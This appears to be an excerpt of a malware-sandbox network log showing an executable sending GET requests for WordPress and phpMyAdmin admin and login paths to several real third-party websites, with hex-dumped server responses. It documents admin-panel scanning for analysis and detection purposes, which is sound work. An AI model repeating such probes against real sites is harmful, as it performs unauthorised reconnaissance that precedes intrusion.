                                                                                                                                                                                                    2023-11-26 05:59:42 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    314192.168.2.46355854.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC166OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    315192.168.2.463567144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC352INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC7840INData Raw: 32 38 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 282a<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC2448INData Raw: 20 25 32 24 73 21 20 55 73 65 20 25 33 24 73 20 69 6e 73 74 65 61 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 69 64 65 72 20 77 72 69 74 69 6e 67 20 6d 6f 72 65 20 69 6e 63 6c 75 73 69 76 65 20 63 6f 64 65 2e 22 3a 5b 22 5c 75 30 30 61 31 25 31 24 73 20 65 73 74 5c 75 30 30 65 31 20 65 6e 20 64 65 73 75 73 6f 20 64 65 73 64 65 20 6c 61 20 76 65 72 73 69 5c 75 30 30 66 33 6e 20 25 32 24 73 21 20 55 73 61 20 25 33 24 73 20 65 6e 20 73 75 20 6c 75 67 61 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 63 6f 6e 73 69 64 65 72 61 20 65 73 63 72 69 62 69 72 20 75 6e 20 63 5c 75 30 30 66 33 64 69 67 6f 20 6d 5c 75 30 30 65 31 73 20 69 6e 63 6c 75 73 69 76 6f 2e 22 5d 7d 7d 2c 22 63 6f 6d 6d 65 6e 74 22 3a 7b 22 72 65 66 65 72 65 6e 63 65 22 3a 22 77 70 2d 61 64 6d 69 6e 5c
                                                                                                                                                                                                    Data Ascii: %2$s! Use %3$s instead. Please consider writing more inclusive code.":["\u00a1%1$s est\u00e1 en desuso desde la versi\u00f3n %2$s! Usa %3$s en su lugar. Por favor considera escribir un c\u00f3digo m\u00e1s inclusivo."]}},"comment":{"reference":"wp-admin\
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    316192.168.2.463568162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC177OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC417INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    317192.168.2.46358735.164.64.2464436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC150INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:41 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedconnection: close
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1321INData Raw: 35 32 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 68 74 6d 6c 2c 62 6f 64 79 7b 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                    Data Ascii: 522<!doctype html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">html,body{ width:100%; height:100%; margin:0; padding:0;}
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    318192.168.2.46358574.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC177OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2c
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7772INData Raw: 32 62 34 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20
                                                                                                                                                                                                    Data Ascii: 2b47<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile"
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3313INData Raw: 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 61 62 6f 75 74 75 73 2f 22 3e 41 62 6f 75 74 20 48 4d 53 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35
                                                                                                                                                                                                    Data Ascii: -post_type menu-item-object-page menu-item-has-children menu-item-3412"><a href="https://himontessori.com/aboutus/">About HMS</a><ul class="sub-menu"><li id="menu-item-3415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3415
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC8192INData Raw: 33 62 31 30 0d 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 62 61 62 79 2d 68 65 61 64 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 68 65 61 64 65 72 2d 69 6d 67 22 3e 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 62 79 2d 63 6f 6e 74 61 69 6e 65 72 20 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 3b10</nav>... #site-navigation --></div></div></div><header id="masthead" class="site-header baby-head-img"> <div class="no-header-img"> <div class="baby-container site-branding ">
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC6934INData Raw: 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 34 2f 27 3e 20 41 70 72 69 6c 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 33 2f 27 3e 20 4d 61 72 63 68 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 32 2f 27 3e 20 46 65 62 72 75 61 72 79 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74
                                                                                                                                                                                                    Data Ascii: 021 </option><option value='https://himontessori.com/2021/04/'> April 2021 </option><option value='https://himontessori.com/2021/03/'> March 2021 </option><option value='https://himontessori.com/2021/02/'> February 2021 </option><option value='htt
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC4275INData Raw: 31 30 61 36 0d 0a 0a 09 09 3c 2f 73 65 6c 65 63 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 64 72 6f 70 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 20 22 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 2d 2d 31 22 20 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 6f 6e 53 65 6c 65 63 74 43 68 61 6e 67 65 28 29 20 7b 0a 09 09 69 66 20 28 20 64 72 6f 70 64 6f 77 6e 2e 6f 70 74 69 6f 6e 73 5b 20 64 72 6f 70 64 6f 77 6e 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 20 5d 2e 76 61 6c 75 65 20 21 3d 3d 20 27 27 20 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: 10a6</select><script type='text/javascript'>/* <![CDATA[ */(function() {var dropdown = document.getElementById( "archives-dropdown--1" );function onSelectChange() {if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {documen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    319192.168.2.46364554.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC174OUTGET /admin/pages/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC511INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 34 64 63 74 72 75 72 73 70 75 65 73 70 30 62 37 66 72 74 34 70 70 65 64 32 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 53 65 63 75 72 69 74 79 2f 6c 6f 67 69 6e 3f 42 61 63 6b 55 52 4c 3d 25 32 46 61 64 6d 69 6e 25 32 46 70 61 67 65 73 25 32 46 0d 0a 78 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3a 20 53 69 6c 76 65 72 53 74 72
